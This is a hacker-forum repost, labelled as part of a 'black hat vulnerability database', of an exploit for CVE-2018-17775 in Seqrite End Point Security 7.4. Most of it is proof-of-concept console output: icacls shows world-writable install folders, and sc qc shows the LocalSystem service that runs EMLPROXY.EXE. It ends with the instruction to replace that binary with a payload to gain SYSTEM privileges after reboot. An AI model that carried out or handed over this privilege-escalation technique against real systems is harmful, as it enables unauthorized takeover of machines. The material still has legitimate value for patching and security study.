跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Seqrite End Point Security 7.4 - Privilege Escalation

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Seqrite End Point Security 7.4 - Privilege Escalation
# Date: 2018-09-13
# Exploit Author: Hashim Jawad - @ihack4falafel
# Vendor Homepage: https://www.seqrite.com/
# Tested on: Windows 7 Enterprise SP1 (x64)
# CVE: CVE-2018-17775

# Description:
# Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite" 
# with very weak folder permissions granting any user full permission "Everyone: (F)" 
# to the contents of the directory and it's subfolders. In addition, the program installs handful 
# of services with binaries within the program folder that run as "LocalSystem". Given 
# the "Self Protection" feature (on by default) is disabled which can be done in number of ways 
#(for instance, if the policy does not enforce EPS client password to change the settings any user 
# can disable that feature), meaning a non-privileged user would be able to 
# elevate privileges to "NT AUTHORITY\SYSTEM".

# PoC

c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
                                 Everyone:(CI)(F)
                                 NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
                                 NT AUTHORITY\SYSTEM:(I)(F)
                                 NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                 BUILTIN\Users:(I)(RX)
                                 BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
                                 CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
                                 APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"

[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Core Mail Protection
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Core Mail Protection
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
                                              NT AUTHORITY\SYSTEM:(I)(F)
                                              BUILTIN\Administrators:(I)(F)
                                              BUILTIN\Users:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                              APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
c:\>

# Exploit:

Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。